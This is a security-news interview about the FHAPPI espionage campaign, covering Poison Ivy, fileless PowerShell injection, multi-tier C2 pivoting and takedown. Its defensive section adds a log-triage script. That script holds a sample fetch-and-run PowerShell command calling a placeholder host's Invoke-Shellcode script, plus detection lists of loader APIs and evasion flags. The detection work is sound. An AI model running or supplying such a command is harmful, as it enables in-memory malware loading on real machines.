Exclusive: Dirty Political Spying Attempt behind the FHAPPI Campaign: all the details in the interview with @unixfreaxjp

Pierluigi Paganini March 21, 2017

The role of China (PRC) in the worldwide cyber espionage game of conditioning political life: when confidential information is brandished against a political opponent.

In the days of the testimony of U.S. federal investigators about the role played by the Russians during the last year, their alleged cyber operation is once again under examination.

The mainstream media is reporting that the F.B.I. director is conducting an investigation into the deployment of computer hackers to undermine the presidential campaign.

All this is happening two weeks after the dump referred to as Vault 7, which reportedly revealed the extensive hacking capabilities of the CIA: iPhones, Android devices, smart TVs and the possibility of turning them into surveillance devices.

So the Russian and US governments are deploying their APT groups: are they the only ones?

That the FHAPPI campaign was really nasty was clear to everyone; the fact that the attacker had a political motivation, however, was not immediately understood. The attackers operated with the intent of causing a sort of political scandal.

We have reason to believe the attackers aimed to make their opponent lose integrity or popularity in the political landscape.

States sponsor cyber attacks that leverage specific kinds of malware, inject them into the victims' computers with ever more sophisticated methods and techniques, and spy on the victims to gather sensitive information and fuel further lethal spear phishing attacks.

It is ever clearer that national CERTs are becoming a mandatory part of any state's line of defence; they are assuming the role of the front line against this kind of state-sponsored activity.

The real questions are:

  • Are they prepared to defeat such sophisticated threats?
  • Are they fast enough to recognize and block this kind of campaign before it spreads widely in their nations?

Actually, the situation is very complex: states have quite different cyber capabilities. Many states do not have an effective cyber security posture and are not resilient to this kind of attack.

The lack of norms of state behavior helps threat actors and rogue states that continue to invest in cyber espionage activities while avoiding sanctions from the international community.

Looking at the next G7 Summit, which will be held in Italy, we cannot underestimate the great importance of the cyber security issues that will be discussed by the participants.

Anyway, at the same meeting we have participants with quite different cyber capabilities, and in some cases with strong, long-running cyber partnerships; think for example of the Five Eyes alliance.

The USA, the UK and Canada are members of the Five Eyes alliance, Germany has supported the US surveillance program in the past, and these countries are probably the most advanced at the G7.

Do you believe they will accept norms of state behavior?

FHAPPI Campaign

Back to the Chinese FHAPPI campaign: we decided to interview the popular researcher @unixfreaxjp, head of the well-known MalwareMustDie malware research team. As usual, with a few strokes of the brush he will show us a disconcerting reality.

  1. Based on the recent analysis you have conducted, did you see a specific “pattern” related to this APT? Any idea about the attackers’ motivation?

A: I am not at liberty to describe any information of the victim side. But this attack is the continuation of the long string of cyber attacks that occurred in the past, targeting the reputation of the targets and their ability to “influence” the political dialogue.
By the way, the way the malware is formed and wrapped tells a lot about what is happening; let’s try to summarize the key findings:

  • The attackers are improving the malware’s functionality to avoid detection by signature checkers during the intrusion and infection phases. They leverage VB encryption, multiple encodings and XOR in the first stage of shellcode injection.
  • Threat actors are trying to hide Poison Ivy in any possible way, for instance by injecting shellcode inside another shellcode and using fileless techniques.
  • Judging by the target, the usage of this Poison Ivy aims to spy on or collect private information about the victim’s activity. The attackers operate to damage the reputation of the victims; for this reason, awareness of these attack patterns is very important.
  • This leads us to believe that the preparation phase of the attack was very accurate. The attackers cleverly examined the victims’ activity BEFORE and DURING the cyber espionage campaign; it is very obvious, since the details all point to a certain scope of target when the data and circumstances are all matched.

  2. Can you describe the threat actor or the real source of the attack to us? Which are the target countries? What do you think about the chance of success for this campaign?

A: PRC (China) is obviously the source of the attack. The analysis allowed us to gather clear evidence about the origin of the attack, many concrete facts and not only assumptions (there are more facts that confirmed the involvement of China than what was written). And China targets the “bilateral” opponent sides; I cannot say more than that.
The chance of success? It’s very high, I must say. The analysis showed that the attackers had already compromised many targets. The attackers thought of everything for this campaign, EVERYTHING. It is better than before.
If they had not abused us as a “payload center”, which is one of their mistakes (grins), and if VXRL had not made a swift move in asking for our cooperation on a takedown request, we would all have learned about this whole scheme a bit later, with some more damage.

  3. In the FHAPPI campaign you have spoken about pivoting; did you see any specific capability of the APT in this sense?

A: Firstly, the “pivot” word wasn’t there from the beginning; it came up when the community was deciding the name, and my good friend El Kentaro just put the “pivot” word in it.
In a way it is a multi-tier pivoted effort. The attack involves several users of the free hosting service, and each user has a specific target, dates and the whole package for infecting for this bad spying purpose; let’s call it TIER-1 of the pivoting effort. Second, the usage of hostnames shows more flexibility for pivoting in case they want to change, burn or throw away the C2. This is TIER-2 of the pivoting effort.
For TIER-3, the attackers purposely abuse a host in another country’s network for the CNC/C2, avoiding the use of their own country’s networks for conducting this attack.
So this is where the pivot word came from.

  4. About the fileless attack, can you describe a countermeasure for the CERTs in more detail?

A: The usage of PowerSploit is an important sign for us; it shows that a vector to inject into a process under an adjustable permitted privilege can be done on Windows systems (and, well, on other OSes too).
But this case shows us to be alert to abuse through the usage of powershell.exe (which is a good tool). The shellcode injected by powershell.exe is the whole PoisonIvy malware itself; that is where the fileless part comes from.
And it is not necessarily “by powershell.exe”, if you know what I mean.
For the APT countermeasure itself, it is a matter of action time. We, in the security ring in Japan, know this. APTs are designed not to be easily detected. When you think an APT is spotted and reported, don’t wait until security products release the blocking signature; reading reference analyses and historical facts and confirming them all by yourself is a must for a CERT. In this case, the Yahoo Incident Team is doing a SUPER great response, and also our good folks at JPCERT/CC.
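To make the countermeasure concrete, here is an added example (not from the interview, nor code from MalwareMustDie) that triages constructed Sysmon-style process-creation records for the pattern described above: powershell.exe launched with evasion flags and an encoded command that, once decoded, calls PowerSploit's in-memory shellcode loader. The log format, field names, sample events and the URL are assumptions made for the example.

```python
import base64
import re

# Constructed sample: a script body that loads shellcode in memory through PowerSploit's
# Invoke-Shellcode, delivered as the interview describes (powershell.exe, nothing on disk).
SAMPLE_SCRIPT = ("IEX (New-Object Net.WebClient).DownloadString("
                 "'http://free-host.invalid/Invoke-Shellcode.ps1'); Invoke-Shellcode -Force")
# -EncodedCommand carries base64 of the UTF-16LE script text; reproduce that here.
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
PS_IMAGE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed Sysmon-style process-creation records: key=value fields separated by '|'.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=" + PS_IMAGE
    + "|CommandLine=powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
    "ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE|Image=" + PS_IMAGE
    + "|CommandLine=powershell.exe -nop -w hidden -ep bypass -enc " + SAMPLE_ENCODED,
]
# Names an in-memory loader has to use: PowerSploit's cmdlets and the Win32 calls behind them.
LOADER_TERMS = ("invoke-shellcode", "invoke-reflectivepeinjection", "virtualalloc",
                "writeprocessmemory", "createremotethread", "createthread", "dllimport")
EVASION_FLAGS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                 "-ep bypass", "-executionpolicy bypass", "-noni", "-noninteractive")
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

def parse_event(line):
    return dict(field.split("=", 1) for field in line.split("|"))

def decode_encoded_command(cmdline):
    """Return the plaintext behind -e/-ec/-enc/-EncodedCommand, or '' if there is none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def triage(event):
    """List the reasons a process-creation event looks like fileless shellcode loading."""
    if "powershell" not in event.get("Image", "").lower():
        return []
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    reasons = ["encoded command"] if decoded else []
    text = (cmd + " " + decoded).lower()  # scan the decoded script, not only the argv
    reasons += ["flag " + f for f in EVASION_FLAGS
                if re.search(r"(?<!\S)" + re.escape(f) + r"(?!\S)", text)]
    reasons += ["loader term " + t for t in LOADER_TERMS if t in text]
    if event.get("ParentImage", "").lower().endswith(OFFICE_PARENTS):
        reasons.append("spawned by an Office application")
    return reasons
```

The benign administrative launch collects a single reason, while the Office-spawned encoded launch collects six, so a threshold of three on the length of the returned list separates the two without a file-based signature.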

  5. How hard was it to convince the authorities to take down this APT, given, as said, that there is not much detection to count on?

A: I used to write fast for malware analysis; I often reverse engineer malware and write about it at the same time. By the time a friend at VXRL reported to us to take down the source of infection, after immediate communication with the authorities, following our trusted community, I decided to write after quickly reversing it, to fulfil the takedown mission FAST, yet I kept on tuning the progress with trusted key persons, including law enforcement too. Our community helped a lot, and we moved as one.
It did not take much time to convince people after they saw the analysis, and to take it down afterwards; in less than 24h all the malware was cleaned up.

  6. Any kind of suggestions for white hats to keep watching this kind of threat?

A: Many abuses nowadays use malware for a similar purpose. There is no specific advice except “to keep staying on alert”, especially if your country is related to or targeted by these types of abuse. The attacker(s) will keep on coming, they will improve; this type of attack cannot be stopped by some “arrests”, and we will just have to be ready to dissect them at their next level.

  7. You added the malware analysis step by step, why? Even though it seems you had already drawn a complete scheme on paper, especially about the shellcode parts.

A: The process for APTs is different from that for public malware. The data is sensitive, much communication and confirmation has to be made, and so on. Not for the analysis or reversing itself (which was done in the first stage).
So I just added stuff in steps, upon some OK signs I received.
Most importantly, this process is an ongoing one. There are many important details that I can never disclose to anyone. Actually, for APT malware analysis the data is a bit too much, but we decided to share with the security community too how rude the actor is in conducting this infection. And if Country A can suffer this, Country B or C, or D, etc., which are in the same geographical territory, can suffer the same.

  8. Can you describe more precisely the time frame for this report, analysis, disclosure and takedown?

A: I can’t describe more than what is already written in the report; it is OPSEC. All I can say is, we took these bad files down in less than 24 hours. And people in my country are learning a lot from this matter to make takedown times faster.

About the Author

Odisseus is an Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing, and development.


Pierluigi Paganini

(Security Affairs – FHAPPI Campaign, Cyber espionage)
